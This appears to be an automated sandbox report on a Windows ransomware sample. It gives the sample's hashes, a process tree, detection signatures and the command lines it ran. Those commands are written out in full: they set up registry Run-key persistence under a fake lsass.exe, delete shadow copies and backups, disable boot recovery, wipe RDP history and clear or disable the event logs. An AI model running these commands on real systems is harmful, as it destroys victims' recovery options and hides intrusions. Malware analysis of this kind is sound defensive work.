2311Exes_636d3c669e36510bf337fd2f1ea64732_tmp_2019-09-18_14_30.txt

1.  
2. * ID: 2311
3. * MalFamily: "Malicious"
4.  
5. * MalScore: 10.0
6.  
7. * File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
8. * File Size: 435200
9. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10. * SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
11. * MD5: "636d3c669e36510bf337fd2f1ea64732"
12. * SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
13. * SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
14. * CRC32: "D4F2AC3B"
15. * SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
16.  
17. * Process Execution:
18. "OQyoOv9HxQ.exe",
19. "cmd.exe",
20. "reg.exe",
21. "lsass.exe",
22. "cmd.exe",
23. "cmd.exe",
24. "cmd.exe",
25. "cmd.exe",
26. "cmd.exe",
27. "cmd.exe",
28. "cmd.exe",
29. "WMIC.exe",
30. "cmd.exe",
31. "vssadmin.exe",
32. "cmd.exe",
33. "reg.exe",
34. "cmd.exe",
35. "reg.exe",
36. "cmd.exe",
37. "reg.exe",
38. "cmd.exe",
39. "attrib.exe",
40. "cmd.exe",
41. "cmd.exe",
42. "wevtutil.exe",
43. "cmd.exe",
44. "wevtutil.exe",
45. "cmd.exe",
46. "wevtutil.exe",
47. "cmd.exe",
48. "sc.exe",
49. "lsass.exe",
50. "lsass.exe",
51. "cmd.exe",
52. "PING.EXE",
53. "PING.EXE",
54. "PING.EXE",
55. "PING.EXE",
56. "PING.EXE",
57. "PING.EXE",
58. "PING.EXE",
59. "PING.EXE",
60. "PING.EXE",
61. "PING.EXE",
62. "PING.EXE",
63. "PING.EXE",
64. "PING.EXE",
65. "PING.EXE",
66. "PING.EXE",
67. "PING.EXE",
68. "PING.EXE",
69. "PING.EXE",
70. "PING.EXE",
71. "PING.EXE",
72. "PING.EXE",
73. "PING.EXE",
74. "PING.EXE",
75. "PING.EXE",
76. "PING.EXE",
77. "PING.EXE",
78. "PING.EXE",
79. "PING.EXE",
80. "PING.EXE",
81. "PING.EXE",
82. "PING.EXE",
83. "PING.EXE",
84. "PING.EXE",
85. "PING.EXE",
86. "PING.EXE",
87. "PING.EXE",
88. "PING.EXE",
89. "PING.EXE",
90. "PING.EXE",
91. "PING.EXE",
92. "PING.EXE",
93. "PING.EXE",
94. "PING.EXE",
95. "PING.EXE",
96. "PING.EXE",
97. "PING.EXE",
98. "PING.EXE",
99. "PING.EXE",
100. "PING.EXE",
101. "PING.EXE",
102. "PING.EXE",
103. "PING.EXE",
104. "PING.EXE",
105. "PING.EXE",
106. "PING.EXE",
107. "PING.EXE",
108. "PING.EXE",
109. "PING.EXE",
110. "PING.EXE",
111. "PING.EXE",
112. "PING.EXE",
113. "PING.EXE",
114. "PING.EXE",
115. "PING.EXE",
116. "PING.EXE",
117. "PING.EXE",
118. "PING.EXE",
119. "PING.EXE",
120. "PING.EXE",
121. "PING.EXE",
122. "PING.EXE",
123. "PING.EXE",
124. "PING.EXE",
125. "PING.EXE",
126. "PING.EXE",
127. "PING.EXE",
128. "PING.EXE",
129. "PING.EXE",
130. "PING.EXE",
131. "PING.EXE",
132. "PING.EXE",
133. "services.exe",
134. "svchost.exe",
135. "WmiPrvSE.exe",
136. "svchost.exe",
137. "taskeng.exe",
138. "taskeng.exe",
139. "msoia.exe",
140. "msoia.exe",
141. "taskeng.exe",
142. "WMIADAP.exe",
143. "taskeng.exe",
144. "VSSVC.exe"
145.  
146.  
147. * Executed Commands:
148. "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
149. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
150. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
151. "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )",
152. "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )",
153. "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
154. "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
155. "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
156. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
157. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
158. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
159. "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
160. "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
161. "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
162. "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
163. "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
164. "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
165. "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
166. "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
167. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
168. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
169. "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
170. "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
171. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
172. "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
173. "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
174. "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
175. "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
176. "taskeng.exe DA0ED248-9EDB-4144-B9E7-AFC1D00A662A S-1-5-18:NT AUTHORITY\\System:Service:",
177. "taskeng.exe A14B62F8-6D27-44D8-BFCB-66F44117F2A4 S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:1",
178. "taskeng.exe 4C64B42C-C15C-4AFB-9A31-7317BC95FE05 S-1-5-18:NT AUTHORITY\\System:Service:",
179. "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
180. "taskeng.exe F7093373-6201-40B8-8D09-6E7E59E028EB S-1-5-18:NT AUTHORITY\\System:Service:",
181. "C:\\Windows\\system32\\vssvc.exe",
182. "vssadmin delete shadows /all /quiet",
183. "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
184. "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
185. "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
186. "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
187. "wevtutil.exe clear-log Application",
188. "wevtutil.exe clear-log Security",
189. "wevtutil.exe clear-log System",
190. "sc config eventlog start=disabled",
191. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
192. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
193. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
194.  
195.  
196. * Signatures Detected:
197.  
198. "Description": "Behavioural detection: Executable code extraction",
199. "Details":
200.  
201.  
202. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
203. "Details":
204.  
205.  
206. "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
207. "Details":
208.  
209. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
210.  
211.  
212. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
213.  
214.  
215. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
216.  
217.  
218. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
219.  
220.  
221. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
222.  
223.  
224. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
225.  
226.  
227. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
228.  
229.  
230. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
231.  
232.  
233. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
234.  
235.  
236. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
237.  
238.  
239. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
240.  
241.  
242. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
243.  
244.  
245. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
246.  
247.  
248. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
249.  
250.  
251. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
252.  
253.  
254. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
255.  
256.  
257. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
258.  
259.  
260. "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
261.  
262.  
263.  
264.  
265. "Description": "Possible date expiration check, exits too soon after checking local time",
266. "Details":
267.  
268. "process": "lsass.exe, PID 2296"
269.  
270.  
271.  
272.  
273. "Description": "Anomalous file deletion behavior detected (10+)",
274. "Details":
275.  
276. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran"
277.  
278.  
279. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran"
280.  
281.  
282. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
283.  
284.  
285. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
286.  
287.  
288. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
289.  
290.  
291. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
292.  
293.  
294. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
295.  
296.  
297. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
298.  
299.  
300. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
301.  
302.  
303. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
304.  
305.  
306. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
307.  
308.  
309. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
310.  
311.  
312. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
313.  
314.  
315. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
316.  
317.  
318. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
319.  
320.  
321. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
322.  
323.  
324. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
325.  
326.  
327. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
328.  
329.  
330. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
331.  
332.  
333. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
334.  
335.  
336. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
337.  
338.  
339. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
340.  
341.  
342. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
343.  
344.  
345. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
346.  
347.  
348. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
349.  
350.  
351. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
352.  
353.  
354. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
355.  
356.  
357. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
358.  
359.  
360. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
361.  
362.  
363. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
364.  
365.  
366. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
367.  
368.  
369. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
370.  
371.  
372. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
373.  
374.  
375. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
376.  
377.  
378. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
379.  
380.  
381. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
382.  
383.  
384. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
385.  
386.  
387. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
388.  
389.  
390. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
391.  
392.  
393. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
394.  
395.  
396. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
397.  
398.  
399. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
400.  
401.  
402. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
403.  
404.  
405. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
406.  
407.  
408. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
409.  
410.  
411. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
412.  
413.  
414. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
415.  
416.  
417. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
418.  
419.  
420. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
421.  
422.  
423. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
424.  
425.  
426. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
427.  
428.  
429. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
430.  
431.  
432. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
433.  
434.  
435. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
436.  
437.  
438. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
439.  
440.  
441. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
442.  
443.  
444. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
445.  
446.  
447. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
448.  
449.  
450. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
451.  
452.  
453. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
454.  
455.  
456. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
457.  
458.  
459. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
460.  
461.  
462. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
463.  
464.  
465. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
466.  
467.  
468. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
469.  
470.  
471. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
472.  
473.  
474. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
475.  
476.  
477. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
478.  
479.  
480. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
481.  
482.  
483. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
484.  
485.  
486. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
487.  
488.  
489. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
490.  
491.  
492. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
493.  
494.  
495. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
496.  
497.  
498. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
499.  
500.  
501. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
502.  
503.  
504. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
505.  
506.  
507. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
508.  
509.  
510. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
511.  
512.  
513. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
514.  
515.  
516. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
517.  
518.  
519. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
520.  
521.  
522. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
523.  
524.  
525. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe"
526.  
527.  
528. "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
529.  
530.  
531.  
532.  
533. "Description": "Guard pages use detected - possible anti-debugging.",
534. "Details":
535.  
536.  
537. "Description": "A process attempted to delay the analysis task.",
538. "Details":
539.  
540. "Process": "WmiPrvSE.exe tried to sleep 361 seconds, actually delayed analysis time by 0 seconds"
541.  
542.  
543. "Process": "PING.EXE tried to sleep 345 seconds, actually delayed analysis time by 0 seconds"
544.  
545.  
546. "Process": "svchost.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
547.  
548.  
549. "Process": "taskeng.exe tried to sleep 488 seconds, actually delayed analysis time by 0 seconds"
550.  
551.  
552.  
553.  
554. "Description": "Performs HTTP requests potentially not found in PCAP.",
555. "Details":
556.  
557. "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
558.  
559.  
560.  
561.  
562. "Description": "A process created a hidden window",
563. "Details":
564.  
565. "Process": "OQyoOv9HxQ.exe -> C:\\Windows\\System32\\cmd.exe"
566.  
567.  
568. "Process": "svchost.exe -> \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE"
569.  
570.  
571.  
572.  
573. "Description": "Executed a command line with /V argument which modifies variable behaviour and whitespace allowing for increased obfuscation options",
574. "Details":
575.  
576. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
577.  
578.  
579.  
580.  
581. "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
582. "Details":
583.  
584. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
585.  
586.  
587.  
588.  
589. "Description": "A ping command was executed with the -n argument possibly to delay analysis",
590. "Details":
591.  
592. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
593.  
594.  
595. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
596.  
597.  
598. "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
599.  
600.  
601.  
602.  
603. "Description": "Uses Windows utilities for basic functionality",
604. "Details":
605.  
606. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
607.  
608.  
609. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
610.  
611.  
612. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
613.  
614.  
615. "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
616.  
617.  
618. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
619.  
620.  
621. "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
622.  
623.  
624. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
625.  
626.  
627. "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
628.  
629.  
